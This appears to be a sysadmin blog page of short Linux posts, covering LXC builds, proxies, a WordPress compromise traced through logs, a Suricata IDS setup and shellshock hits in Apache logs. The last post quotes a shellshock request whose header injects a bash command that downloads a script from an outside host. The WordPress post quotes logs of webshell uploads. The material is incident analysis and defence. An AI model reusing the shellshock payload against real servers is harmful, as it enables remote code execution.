Header RSS Feed
 
If you only want to see the articles of a certain category, please click on the desired category below:
ALL Android Backup BSD Database Hacks Hardware Internet Linux Mail MySQL Nagios/Monitoring Network Personal PHP Proxy Shell Solaris Unix Virtualization VMware Windows Wyse

Install LXC from source on Ubuntu 14.04 Trusty
Wednesday - Nov 26th 2014 - by - (0 comments)

For debugging or testing new upstream versions of LXC, it is handy to install LXC from source and overwrite (if it exists) a LXC version installed through apt.

The following steps explain how to compile and install LXC from source on an Ubuntu 14.04 LTS where the same directory paths (as known from the installation through the package) are used.

Clone git repository or download current zip of master branch:

git clone https://github.com/lxc/lxc.git

or

wget https://github.com/lxc/lxc/archive/master.zip; unzip master.zip

Install required packages to build LXC:

apt-get install build-essential automake autoconf pkg-config docbook2x libapparmor-dev libselinux1-dev libcgmanager-dev libpython3-dev python3-dev libcap-dev

Change into the cloned or unzipped repository and compile:

if [ -d lxc ]; then cd lxc; elif [ -d lxc-master ]; then cd lxc-master; fi

./autogen.sh

./configure --prefix=/usr --libdir=/usr/lib/x86_64-linux-gnu --libexecdir=/usr/lib/x86_64-linux-gnu --with-rootfs-path=/usr/lib/x86_64-linux-gnu/lxc --sysconfdir=/etc --localstatedir=/var --with-config-path=/var/lib/lxc --enable-python --enable-doc --disable-rpath --enable-apparmor --enable-selinux --disable-lua --enable-tests --enable-cgmanager --enable-capabilities --with-distro=ubuntu

make; make install

You can then verify that the lxc scripts are built against the new version (as of today the current version in master is 1.1.0-alpha2):

ldd /usr/bin/lxc-start | grep liblxc
        liblxc.so.1 => /usr/lib/x86_64-linux-gnu/liblxc.so.1 (0x00007f2c9e58b000)

ll /usr/lib/x86_64-linux-gnu/liblxc.so.1
lrwxrwxrwx 1 root root 22 Nov 26 13:31 /usr/lib/x86_64-linux-gnu/liblxc.so.1 -> liblxc.so.1.1.0.alpha2


 

Permission denied error on /root/.bash_profile when running su command
Tuesday - Nov 25th 2014 - by - (0 comments)

On an Ubuntu 14 server I recently saw a strange error on stdout when I tried to launch a command as another user through "su -":

su - toto -m -c "/srv/tomcat/toto/bin/startup.sh"
-su: /root/.bash_profile: Permission denied
Using CATALINA_BASE:   /srv/tomcat/toto
Using CATALINA_HOME:   /srv/tomcat
Using CATALINA_TMPDIR: /srv/tomcat/toto/temp
Using JRE_HOME:        /srv/java
Using CLASSPATH:       /srv/tomcat/bin/bootstrap.jar:/srv/tomcat/bin/tomcat-juli.jar
Tomcat started.

Although the command worked and was successfully executed, I was wondering about the Permission denied error on /root/.bash_profile. To fully (or even partly) understand how bash handles different types of shells, you should take a look at "man bash" and grep for INVOCATION. There it is written black on white (or white on black in a standard console) - unfortunately not very clear though. Luckily I found the following graphic a while ago which explains which type of shell is loading which files (the printed version of it is hanging behind me in my office by the way).

Bash Login loaded files

Source: http://www.solipsys.co.uk/new/BashInitialisationFiles.html 

Because the shell environment of root is kept by using the -m parameter (preserve environment) and because of the "su -" which is interpreted as a login shell, the shell environment tries to read first /etc/profile and then
/root/.bash_profile. But because toto user cannot access /root/.bash_profile there comes this permission denied error.

If the /root folder would allow permission to be read by the toto user, the same command works fine without any permission denied error:

chmod 755 /root
su - toto -m -c "/srv/tomcat/toto/bin/shutdown.sh"
Using CATALINA_BASE:   /srv/tomcat/toto
Using CATALINA_HOME:   /srv/tomcat
Using CATALINA_TMPDIR: /srv/tomcat/toto/temp
Using JRE_HOME:        /srv/java
Using CLASSPATH:       /srv/tomcat/bin/bootstrap.jar:/srv/tomcat/bin/tomcat-juli.jar

But granting access to /root is bad. There are other alternatives.
su can also be launched without a login shell (without the dash after su):

su toto -m -c "/srv/tomcat/toto/bin/startup.sh"
Using CATALINA_BASE:   /srv/tomcat/toto
Using CATALINA_HOME:   /srv/tomcat
Using CATALINA_TMPDIR: /srv/tomcat/toto/temp
Using JRE_HOME:        /srv/java
Using CLASSPATH:       /srv/tomcat/bin/bootstrap.jar:/srv/tomcat/bin/tomcat-juli.jar
Tomcat started.

When the same command is launched without the login shell, it just reads the $BASH_ENV from the current session (from root), without trying to load any other files (from /root). Hence no permission denied error.

 

How to use openSUSE zypper behind a proxy (with authentication)
Monday - Nov 10th 2014 - by - (0 comments)

Was trying to figure out, how to use "zypper" behind a http proxy which requires authentication. Because direct Internet access was cut, an installation through zypper would fail with this message:

geeko:~ # zypper se vnc
Download (curl) error for 'http://dl.google.com/linux/talkplugin/rpm/stable/x86_64/repodata/repomd.xml':
Error code: Connection failed

Turns out it's actually pretty easy - once you know how to do it.
In openSUSE there is a global proxy configuration file /etc/syconfig/proxy which can be edited to your needs. For example:

HTTP_PROXY="myproxy.example.com:8080"

This works fine if you don't require authentication to go through the proxy. But if you need authentication, zypper will still fail:

geeko:~ # zypper se vnc
Download (curl) error for 'http://dl.google.com/linux/talkplugin/rpm/stable/x86_64/repodata/repomd.xml':
Error code: HTTP response: 407
Error message: The requested URL returned error: 407 Proxy Authorization Required

Abort, retry, ignore? [a/r/i/? shows all options] (a): a

For authentication, the same file (/etc/syconfig/proxy) is also used. The user and password can be entered into the HTTP_PROXY definition:

HTTP_PROXY="http://myusername:mypassword@myproxy.example.com:8080"

And voilą, zypper can now be launched right away (without having to re-login):

geeko:~ # zypper se vnc
Loading repository data...
Reading installed packages...
[...]

Additionally to this, there is also a helpful proxy exception definition which can be configured in /etc/syconfig/proxy:

NO_PROXY="localhost, 127.0.0.1, 10.0.0.0/8, 192.168.0.0/16"

This also applies to SLES (SuSE Linux Enterprise Server) and SLED (SuSE Linux Enterprise Desktop), see http://www.novell.com/support/kb/doc.php?id=7006845.

 

Wordpress hacked through vulnerability in Wysija (Mail Poet)
Sunday - Nov 9th 2014 - by - (0 comments)

A few days ago, I discovered a hacked website which was sending thousands of spams. As I always (or mostly) do, I try to find the entry point of the hack. I do that a lot and usually that doesn't deserve a new blog entry, but in this case I had to follow the traces back for several months - which is rare.

It all started with tons of spams being sent out. I was able to pin it down to a php script:

mail() on [/var/www/customer/html/wordpress/wp-content/uploads/wysija/bookmarks/small/02/options.php:1]: To: my@hotmai.com -- Headers: From: "Ebony Beasley" <ebony_beasley@example.com>  Reply-To:"Ebony Beasley" <ebony_beasley@example.com>  X-Priority: 3 (Normal)  MIME-Version: 1.0  Content-Type: text/html; charset="iso-8859-1"  Content-Transfer-Encoding: 8bit

This file was uploaded on November 6th:

-rw-r--r-- 1 www-data www-data 64680 Nov  6 22:33 /var/www/customer/html/wp-content/uploads/wysija/bookmarks/small/02/options.php

To upload the file, another file was used:

64.90.54.5 - - [06/Nov/2014:22:33:12 +0100] "POST /wordpress/wp-content/themes/Chameleon/sidebar.php HTTP/1.1" 200 207 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"

-rwxrwxrwx 1 customer www-data 13928 Oct  7 19:17 /var/www/customer/html/wordpress/wp-content/themes/Chameleon/sidebar.php

 ... and this file was uploaded by yet another one:

93.103.21.231 - - [07/Oct/2014:19:17:06 +0200] "POST /wordpress/wp-content/uploads/wysija/themes/mailp/index.php?cookie=1 HTTP/1.0" 200 13 "-" "Googlebot/2.1 (+http://www.google.com/bot.html)"

-rw-r--r-- 1 www-data www-data 14155 Aug 25 22:18 /var/www/customer/html/wordpress/wp-content/uploads/wysija/themes/mailp/index.php

Now we are back in August and here the real hack happened. To upload the file "index.php", a security vulnerability in the "mail poet" plugin was used:

77.79.40.195 - - [25/Aug/2014:07:59:55 +0200] "POST /wordpress/wp-admin/admin-post.php?page=wysija_campaigns&action=themes HTTP/1.0" 302 - "http://www.example.com/wordpress/wp-admin/admin.php?page=wysija_campaigns&id=1&action=editTemplate" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.53 Safari/525.19"
77.79.40.195 - - [25/Aug/2014:07:59:57 +0200] "GET /wordpress/wp-content/uploads/wysija/themes/mailp/index.php HTTP/1.1" 200 12 "http://www.example.com/wordpress/wp-admin/admin.php?page=wysija_campaigns&id=1&action=editTemplate" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.53 Safari/525.19"
77.79.40.195 - - [25/Aug/2014:19:58:56 +0200] "POST /wordpress/wp-admin/admin-post.php?page=wysija_campaigns&action=themes HTTP/1.0" 302 - "http://www.example.com/wordpress/wp-admin/admin.php?page=wysija_campaigns&id=1&action=editTemplate" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.53 Safari/525.19"
77.79.40.195 - - [25/Aug/2014:19:59:01 +0200] "GET /wordpress/wp-content/uploads/wysija/themes/mailp/index.php HTTP/1.1" 200 12 "http://www.example.com/wordpress/wp-admin/admin.php?page=wysija_campaigns&id=1&action=editTemplate" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.53 Safari/525.19"
77.79.40.195 - - [25/Aug/2014:22:18:13 +0200] "POST /wordpress/wp-content/uploads/wysija/themes/mailp/index.php HTTP/1.0" 200 12 "-" "Mozilla/5.0 (Windows)"
77.79.40.195 - - [25/Aug/2014:22:18:14 +0200] "GET /wordpress/wp-content/uploads/wysija/themes/mailp/index.php?cookie=1 HTTP/1.1" 200 8 "-" "Mozilla/5.0 (Windows)"

This security vulnerability was discovered just a month before August by Sucuri (http://blog.sucuri.net/2014/07/remote-file-upload-vulnerability-on-mailpoet-wysija-newsletters.html).

There would have been two simple ways to prevent the hack:

1) Additional authentication on the wp-admin folder, for example a simple http basic authentication
2) Regularly update Wordpress and all plugins/themes (the hack happened at the end of August, so there was enough time to do the update)

 

Using preseed to create two volume groups on same disk
Wednesday - Oct 22nd 2014 - by - (0 comments)

The following preseed partman recipe allows to create two volume groups on the same logical disk (/dev/sda):

d-i partman-auto/disk string /dev/sda
d-i partman-auto/method string lvm
d-i partman-auto/choose_recipe select mypartitioning

d-i partman-auto/expert_recipe string \
      mypartitioning :: \
              512 512 512 ext2                                \
                      $primary{ }                             \
                      $bootable{ }                            \
                      method{ format } format{ }              \
                      use_filesystem{ } filesystem{ ext2 }    \
                      label{ boot }                           \
                      mountpoint{ /boot }                     \
              . \
              122880 122880 122880 ext4                       \
                      $primary{ }                             \
                      method{ lvm }                           \
                      device{ /dev/sda2 }                     \
                      vg_name{ vg1 }                          \
              . \
              122880 1000000000 1000000000 ext4               \
                      $primary{ }                             \
                      method{ lvm }                           \
                      device{ /dev/sda3 }                     \
                      vg_name{ vg2 }                          \
              . \
              8192 8192 8192 linux-swap                       \
                      $lvmok{ } in_vg{ vg1 }                  \
                      lv_name{ swap }                         \
                      method{ swap } format{ }                \
              . \
              10240 10240 10240 ext4                          \
                      $lvmok{ } in_vg{ vg1 }                  \
                      lv_name{ root }                         \
                      method{ format } format{ }              \
                      use_filesystem{ } filesystem{ ext4 }    \
                      label{ root }                           \
                      mountpoint{ / }                         \
              . \
              8192 8192 8192 ext4                             \
                      $lvmok{ } in_vg{ vg1 }                  \
                      lv_name{ var }                          \
                      method{ format } format{ }              \
                      use_filesystem{ } filesystem{ ext4 }    \
                      label{ var }                            \
                      mountpoint{ /var }                      \
              .

This will create:

  • a primary partition with a size of ~500MB (the final OS defined it as 473MB) mounted on /boot
  • Another primary partition with a size of ~122GB (final OS: 114GB) used as PV for the volume group vg1
  • Another primary partition with a minimum size of ~122GB and max size of ... so big to use the whole disk .. for the volume group vg2
  • Create a swap partition with a size of 8GB as LV "swap" in the volume group vg1
  • Create a root (/) partition with a size of 10GB als LV "root" in the volume group vg1
  • Create a /var partition with a size of 8GB as LV "var" in the volume group vg1


 

Using Nagios check_smtp -S without SSLv3 (sslv3 alert handshake failure)
Tuesday - Oct 21st 2014 - by - (0 comments)

The recently discovered CVE-2014-3566 (nicknamed Poodle) has generally caused a lot of configuration effort in the whole Internet. After 18 years in service (SSLv3 was published 1996!), suddenly SSLv3 needed to be disabled everywhere.

While on the HTTP side most browsers have been using TLS for a long time, the story is different on the smtp protocol. A typical example is the Nagios plugins check_smtp which can be used with the parameter "-S" to check the mail server with STARTTLS.

After disabling SSLv3 on the remote mail server, Nagios went wild and reported an alert (CRITICAL - Cannot make SSL connection).
When running the plugin manually, more information is shown:

./check_smtp -H mailserver.example.com -S
CRITICAL - Cannot make SSL connection.
140449663530656:error:14077410:SSL routines:SSL23_GET_SERVER_HELLO:sslv3 alert handshake failure:s23_clnt.c:732:
CRITICAL - Cannot create SSL context.

Looks like check_smtp wants to use sslv3, no matter what (hence sslv3 alert handshake failure).

Before you think "Oh! My Nagios plugins are old. That must be it!". BUZZ! Nope, it doesn't matter if you are using nagios-plugins 1.4.16 or the newest 2.0.3 (believe me, I've tried both).
The reason for this is the openssl command, which is used in the background by check_smtp:

openssl s_client -connect mailserver.example.com:25 -starttls smtp
CONNECTED(00000003)
139976003229344:error:14077410:SSL routines:SSL23_GET_SERVER_HELLO:sslv3 alert handshake failure:s23_clnt.c:732:

The error looks familiar, doesn't it? So let's check out the openssl version:

openssl version
OpenSSL 1.0.1 14 Mar 2012

Ugh. That's quite old, given all the openssl hickups in the past year. Let's check out the OS:

cat /etc/issue.net
Ubuntu 12.04.5 LTS

OK. To be honest: I expected a more recent version on an Ubuntu LTS - although it's not the newest LTS.

Let's compare this to a Debian Wheezy.

cat /etc/issue.net
Debian GNU/Linux 7

openssl version
OpenSSL 1.0.1e 11 Feb 2013

That looks newer. Wow, Debian is newer! (insider joke :) )

Let's do the same tests as before:

./check_smtp --help
check_smtp v1.4.16 (nagios-plugins 1.4.16)

./check_smtp -H mailserver.example.com -S
SMTP OK - 0.360 sec. response time|time=0.359723s;;;0.000000

Here it works. Simply because openssl is able to connect to the remote mailserver without using sslv3:

openssl s_client -connect mailserver.example.com:25 -starttls smtp
CONNECTED(00000003)
depth=1 C = US, O = "GeoTrust, Inc.", CN = RapidSSL CA
verify error:num=20:unable to get local issuer certificate
verify return:0
---
Certificate chain
 0 s:/serialNumber=XXXXXXXXXXXX/OU=GT12345678/OU=See www.rapidssl.com/resources/cps (c)14/OU=Domain Control Validated - RapidSSL(R)/CN=mailserver.example.com
   i:/C=US/O=GeoTrust, Inc./CN=RapidSSL CA
 1 s:/C=US/O=GeoTrust, Inc./CN=RapidSSL CA
   i:/C=US/O=GeoTrust Inc./CN=GeoTrust Global CA
---
Server certificate
-----BEGIN CERTIFICATE-----
[...]

So before you blame your monitoring plugins, make sure your openssl version is able to handle TLS.

 

Network Intrusion Detection System with Suricata on Debian Wheezy
Wednesday - Oct 8th 2014 - by - (2 comments)

Suricata is a network intrustion detection system (NIDS) which has a goal to become the "next snort", the de facto standard of NIDS. Both Suricata and Snort are running on rules which are both compatible with each other.

On Debian Wheezy there's the following package available in the repository:

root@debian-wheezy:~# apt-cache show suricata
Package: suricata
Version: 1.2.1-2
Installed-Size: 3809
Maintainer: Pierre Chifflier
Architecture: amd64
Depends: libc6 (>= 2.4), libcap-ng0, libgcrypt11 (>= 1.4.5), libgnutls26 (>= 2.12.17-0), libhtp1 (>= 0.2.6), libmagic1, libnet1 (>= 1.1.2.1), libnetfilter-queue1 (>= 0.0.15), libnfnetlink0 (>= 1.0.0), libpcap0.8 (>= 1.0.0), libpcre3 (>= 8.10), libprelude2, libyaml-0-2
Recommends: oinkmaster, snort-rules-default
Description-en: Next Generation Intrusion Detection and Prevention Tool
 Suricata is a network Intrusion Detection System (IDS). It is based on
 rules (and is fully compatible with snort rules) to detect a variety of
 attacks / probes by searching packet content.

However there are two big downsides with this package:

1) It is old. In the Wheezy repo Suricata is at version 1.2.1 while the sources of 2.4 have been released in September.
2) It doesn't work. I don't know if I did something wrong, but I installed the package on two newly installed virtual machines and nothing was ever logged. Not even local attacks simulated with nikto.

When I installed Suricata with the latest source package, it immediately started to work. That's why this article is about running Suricata from source.

1) Install pre-requirements
The following packages are enought to compile Suricata on a minimal Debian Wheezy.

apt-get install build-essential pkg-config libpcre3 libpcre3-dbg libpcre3-dev libyaml-0-2 libyaml-dev \
autoconf automake libtool libpcap-dev libnet1-dev zlib1g zlib1g-dev libmagic-dev libcap-ng-dev \
libnetfilter-queue-dev libnetfilter-queue1 libnfnetlink-dev libnfnetlink0

2) Download and unpack
Download the newest release (at the time of this writing this was 2.0.4) and unpack it.

cd /root/src; wget http://www.openinfosecfoundation.org/download/suricata-2.0.4.tar.gz
tar -xzf suricata-2.0.4.tar.gz; cd suricata-2.0.4

3) Compile
A little side node for the compile step: If you want to use Suricata as both IDS (Intrusion Detection System) AND IPS (Intrusion Prevention System), you must use "--enable-nfqueue" as configure option. You can also just compile with this option, just to be IPS-ready. The final switch has to be done in the configuration file anyway.
With the following configure line, the program will use the following folders:

/usr/bin: For the executable binary (/usr/bin/suricata)
/etc/suricata: Config files (most importantly suricata.yaml)
/etc/suricata/rules: Rule files
/var/log/suricata: Log files
/var/run/suricata: pid file

./configure --enable-nfqueue --prefix=/usr --sysconfdir=/etc --localstatedir=/var

The output at the end is the following:

Generic build parameters:
  Installation prefix (--prefix):          /usr
  Configuration directory (--sysconfdir):  /etc/suricata/
  Log directory (--localstatedir) :        /var/log/suricata/

  Host:                                    x86_64-unknown-linux-gnu
  GCC binary:                              gcc
  GCC Protect enabled:                     no
  GCC march native enabled:                yes
  GCC Profile enabled:                     no

To build and install run 'make' and 'make install'.

You can run 'make install-conf' if you want to install initial configuration
files to /etc/suricata/. Running 'make install-full' will install configuration
and rules and provide you a ready-to-run suricata.

To install Suricata into /usr/bin/suricata, have the config in
/etc/suricata and use /var/log/suricata as log dir, use:
./configure --prefix=/usr/ --sysconfdir=/etc/ --localstatedir=/var/

Then run make followed by make install-full, which downloads additional emerging rules right into /etc/suricata/rules (thanks!):

make
make install-full

/usr/bin/wget -qO - http://rules.emergingthreats.net/open/suricata-2.0/emerging.rules.tar.gz | tar -x -z -C "/etc/suricata/" -f -

You can now start suricata by running as root something like '/usr/bin/suricata -c /etc/suricata//suricata.yaml -i eth0'.

If a library like libhtp.so is not found, you can run suricata with:
'LD_LIBRARY_PATH=/usr/lib /usr/bin/suricata -c /etc/suricata//suricata.yaml -i eth0'.

While rules are installed now, it's highly recommended to use a rule manager for maintaining rules.
The two most common are Oinkmaster and Pulledpork. For a guide see:
https://redmine.openinfosecfoundation.org/projects/suricata/wiki/Rule_Management_with_Oinkmaster

4) Adapt the configuration
The configuration file is, as mentioned above, /etc/suricata/suricata.yaml. This format is in yaml (yet another markup language) but just edit the file with your favorite editor (mine is vim).
I suggest you go from top to bottom of the config file to learn as much as possible and to set the configuration to your environments, but the following points are the settings I changed. Note that I didn't activate IPS with these config changes.

Disable console logging and log to file instead:

  # Define your logging outputs.  If none are defined, or they are all
  # disabled you will get the default - console output.
  outputs:
  - console:
      enabled: no
  - file:
      enabled: yes
      filename: /var/log/suricata/suricata.log

Define your HOME_NET (which is the private LAN where your machines is connected to):

  # Holds the address group vars that would be passed in a Signature.
  # These would be retrieved during the Signature address parsing stage.
  address-groups:

    HOME_NET: "[192.168.112.0/24]"

Adapt the host-os-policy and set your machine's IP address next to the policy (yes, Debian is a Linux distro, duh!):

# Host specific policies for defragmentation and TCP stream
# reassembly.  The host OS lookup is done using a radix tree, just
# like a routing table so the most specific entry matches.
host-os-policy:
  # Make the default policy windows.
  windows: []
  bsd: []
  bsd-right: []
  old-linux: []
  linux: [192.168.112.136]
  old-solaris: []
  solaris: []
  hpux10: []
  hpux11: []
  irix: []
  macos: []
  vista: []
  windows2k3: []

Set the paths to classification and reference-config-file correct (they should now be in the rules folder):

classification-file: /etc/suricata/rules/classification.config
reference-config-file: /etc/suricata/rules/reference.config

5) Start Suricata
Now let's start Suricata in daemon mode (-D) and see what happens... (that's exciting!)

suricata -c /etc/suricata/suricata.yaml -i eth0 -D

Suricata immediately starts to write log files into /var/log/suricata:

ls -ltr
total 360
drwxr-xr-x 2 root root   4096 Oct  8 21:49 files
drwxr-xr-x 2 root root   4096 Oct  8 21:49 certs
-rw-r----- 1 root root      0 Oct  8 21:52 http.log
-rw-r--r-- 1 root root    545 Oct  8 21:52 suricata.log
-rw-r--r-- 1 root root   3998 Oct  8 21:52 stats.log
-rw-r----- 1 root root 233626 Oct  8 21:52 unified2.alert.1412797965
-rw-r----- 1 root root 111321 Oct  8 21:52 fast.log

These logs are very important and can be simply explained:

http.log: Logs traffic/attacks to a local web server
suricata.log: The program's log file (which we have defined in the configuration file)
stats.log: Continued logging of statistics
unified2.alert.TIMESTAMP: The alerts are logged into this file in barnyard2 (by2) format
fast.log: Clear text logging of alerts

Now the unified2.alert log file is very interesting. In combination with barnyard2 (https://github.com/firnsy/barnyard2) the alerts can be read and stored into an external place, for example syslog or into a data base. I might follow up on this with a dedicated article...

6) Test an attack
I mentioned "nikto" above, which can be used to test-attack a web server. Let's do this and see how Suricata reacts:

root@attacker:~/nikto-master/program# ./nikto.pl -h 192.168.112.136 -C all

Holy sh!t... I only post the last few lines of the output:

tail /var/log/suricata/http.log
10/08/2014-22:29:20.464061 192.168.112.136 [**] /solr/admin/ [**] Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:006808) [**] 192.168.112.133:41243 -> 192.168.112.136:80
10/08/2014-22:29:20.466145 192.168.112.136 [**] /html/vergessen.html [**] Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:006809) [**] 192.168.112.133:41243 -> 192.168.112.136:80
10/08/2014-22:29:20.468097 192.168.112.136 [**] /typo3/install/index.php [**] Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:006810) [**] 192.168.112.133:41243 -> 192.168.112.136:80
10/08/2014-22:29:20.470129 192.168.112.136 [**] /dnnLogin.aspx [**] Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:006811) [**] 192.168.112.133:41243 -> 192.168.112.136:80
10/08/2014-22:29:20.474056 192.168.112.136 [**] /dnn/Login.aspx [**] Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:006812) [**] 192.168.112.133:41243 -> 192.168.112.136:80
10/08/2014-22:29:20.476151 192.168.112.136 [**] /tabid/400999900/ctl/Login/portalid/699996/Default.aspx [**] Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:006813) [**] 192.168.112.133:41243 -> 192.168.112.136:80
10/08/2014-22:29:20.478121 192.168.112.136 [**] /Portals/_default/Cache/ReadMe.txt [**] Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:006814) [**] 192.168.112.133:41243 -> 192.168.112.136:80
10/08/2014-22:29:20.480445 192.168.112.136 [**] /Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx [**] Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:006816) [**] 192.168.112.133:41243 -> 192.168.112.136:80
10/08/2014-22:29:20.483119 192.168.112.136 [**] /typo3_src/ChangeLog [**] Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:006817) [**] 192.168.112.133:41243 -> 192.168.112.136:80
10/08/2014-22:29:20.487481 192.168.112.136 [**] /_about [**] Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:006818) [**] 192.168.112.133:41243 -> 192.168.112.136:80

In total Suricata discovered and logged more than 20'000 attacks:

cat /var/log/suricata/http.log  | grep -c Nikto
22475

In the fast.log much less entries are logged:

tail /var/log/suricata/fast.log
10/08/2014-22:28:28.744886  [**] [1:2221028:1] SURICATA HTTP Host header invalid [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.112.133:40924 -> 192.168.112.136:80
10/08/2014-22:28:45.976806  [**] [1:2016184:5] ET WEB_SERVER ColdFusion administrator access [**] [Classification: Web Application Attack] [Priority: 1] {TCP} 192.168.112.133:41028 -> 192.168.112.136:80
10/08/2014-22:29:07.430596  [**] [1:2016184:5] ET WEB_SERVER ColdFusion administrator access [**] [Classification: Web Application Attack] [Priority: 1] {TCP} 192.168.112.133:41123 -> 192.168.112.136:80
10/08/2014-22:29:07.432698  [**] [1:2016184:5] ET WEB_SERVER ColdFusion administrator access [**] [Classification: Web Application Attack] [Priority: 1] {TCP} 192.168.112.133:41123 -> 192.168.112.136:80
10/08/2014-22:29:07.435637  [**] [1:2016184:5] ET WEB_SERVER ColdFusion administrator access [**] [Classification: Web Application Attack] [Priority: 1] {TCP} 192.168.112.133:41123 -> 192.168.112.136:80
10/08/2014-22:29:07.438709  [**] [1:2016184:5] ET WEB_SERVER ColdFusion administrator access [**] [Classification: Web Application Attack] [Priority: 1] {TCP} 192.168.112.133:41123 -> 192.168.112.136:80
10/08/2014-22:29:11.417867  [**] [1:2200003:1] SURICATA IPv4 truncated packet [**] [Classification: (null)] [Priority: 3] [**] [Raw pkt: 00 0C 29 CF F6 6D 00 0C 29 3D 0D 45 08 00 45 00 0B 84 8B 5D 40 00 40 06 41 B8 C0 A8 70 85 C0 A8 ]
10/08/2014-22:29:12.076980  [**] [1:2200003:1] SURICATA IPv4 truncated packet [**] [Classification: (null)] [Priority: 3] [**] [Raw pkt: 00 0C 29 3D 0D 45 00 0C 29 CF F6 6D 08 00 45 00 11 2C CE AB 40 00 40 06 F8 C1 C0 A8 70 88 C0 A8 ]
10/08/2014-22:29:19.187059  [**] [1:2221007:1] SURICATA HTTP invalid content length field in request [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.112.133:41235 -> 192.168.112.136:80

So this is how you get a new Suricata version installed quickly and painlessly on a Debian Wheezy. Enjoy.

 

ZFS is still resilvering when 100% done
Tuesday - Oct 7th 2014 - by - (1 comments)

On a Solaris 10 server I needed to replace a disk in a ZFS pool by using a spare drive:

zpool replace mypool c4t69d0 c5t65d0

ZFS then began to resilver the drive:

zpool status                          
  pool: mypool
 state: ONLINE
status: One or more devices is currently being resilvered.  The pool will
        continue to function, possibly in a degraded state.
action: Wait for the resilver to complete.
 scrub: resilver in progress for 0h0m, 0.00% done, 199h10m to go
config:
        NAME           STATE     READ WRITE CKSUM
        mypool         ONLINE       0     0     0
          mirror       ONLINE       0     0     0
            spare      ONLINE       0     0     0
              c4t69d0  ONLINE       0     0     0
              c5t65d0  ONLINE       0     0     0  16.6M resilvered
            c4t66d0    ONLINE       0     0     0
        spares
          c5t65d0      INUSE     currently in use
          c5t85d0      AVAIL  

After almost 11 hours, the scrub line mentioned 100% done, but the status was still resilvering:

 zpool status
  pool: mypool
 state: ONLINE
status: One or more devices is currently being resilvered.  The pool will
        continue to function, possibly in a degraded state.
action: Wait for the resilver to complete.
 scrub: resilver in progress for 10h45m, 100.00% done, 0h0m to go
config:
        NAME           STATE     READ WRITE CKSUM
        mypool         ONLINE       0     0     0
          mirror       ONLINE       0     0     0
            spare      ONLINE       0     0     0
              c4t69d0  ONLINE       0     0     0
              c5t65d0  ONLINE       0     0     0  480G resilvered
            c4t66d0    ONLINE       0     0     0
        spares
          c5t65d0      INUSE     currently in use
          c5t85d0      AVAIL  

Is the status line wrong? Can I ignore it? Or is the 100% a false information? I came across this post in the FreeNAS.org forums where in general the OP was asked to be patient and... just wait. So that's what I did, too. And indeed, a few hours later the resilvering finished:

zpool status
  pool: mypool
 state: ONLINE
 scrub: resilver completed after 12h21m with 0 errors on Mon Oct  6 20:51:46 2014
config:
        NAME           STATE     READ WRITE CKSUM
        mypool         ONLINE       0     0     0
          mirror       ONLINE       0     0     0
            spare      ONLINE       0     0     0
              c4t69d0  ONLINE       0     0     0
              c5t65d0  ONLINE       0     0     0  486G resilvered
            c4t66d0    ONLINE       0     0     0
        spares
          c5t65d0      INUSE     currently in use
          c5t85d0      AVAIL  

Note that another 6GB were resilvered in between. So there is no technical way to solve this. It's just patience.

At the end I just needed to detach c4t69d0:

zpool detach mypool c4t69d0

zpool status
  pool: mypool
 state: ONLINE
 scrub: resilver completed after 12h21m with 0 errors on Mon Oct  6 20:51:46 2014
config:
        NAME           STATE     READ WRITE CKSUM
        mypool         ONLINE       0     0     0
          mirror       ONLINE       0     0     0
            c5t65d0    ONLINE       0     0     0  486G resilvered
            c4t66d0    ONLINE       0     0     0
        spares
          c5t85d0      AVAIL  

 

awk issue when trying to sort variables with same values
Monday - Sep 29th 2014 - by - (0 comments)

One month ago I wrote about a possibility how to "Use bash to compare remote cpu load and print lowest value of array".

Today I encountered an issue with exactly this command:

# for server in server01 server02 server03 server04; do
  case $server in
    server01) load[1]=$(ssh root@$server "cat /proc/loadavg | awk '{print \$3}'");;
    server02) load[2]=$(ssh root@$server "cat /proc/loadavg | awk '{print \$3}'");;
    server03) load[3]=$(ssh root@$server "cat /proc/loadavg | awk '{print \$3}'");;
    server04) load[4]=$(ssh root@$server "cat /proc/loadavg | awk '{print \$3}'");;
  esac
done

# echo "${load[*]}" | tr ' ' '\n' | awk 'NR==1{min=$0}NR>1 && $1<min{min=$1;pos=NR}END{print pos}'

#

The returned position was not shown - just an empty line was returned.
Why's that? Let's take a look at all the values in the array "load":

# echo "${load[*]}"
0.05 0.05 0.05 0.05

So all array values have the exact same value. awk can't therefore define the lowest value.

The solution to this is to do a "lower or equal" comparison (note the "<="):

# echo "${load[*]}" | tr ' ' '\n' | awk 'NR==1{min=$0}NR>1 && $1<=min{min=$1;pos=NR}END{print pos}'
4

When all values are the same, awk will end up returning the position of the last found value.

 

Are there any shellshock attacks (in Apache access logs)?
Friday - Sep 26th 2014 - by - (1 comments)

Yes, shellshock is the nickname of the latest big vulnerability after the infamous SSL Heartbleed bug. But is it actually used? Do people attack?

I analyzed the access logs of ~1500 domains and I only found two hits:

109.95.210.196 - - [25/Sep/2014:19:48:24 +0200] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.1" 404 224 "-" "() { :;}; /bin/bash -c \"/usr/bin/wget http://singlesaints.com/firefile/temp?h=example.com -O /tmp/a.pl\""

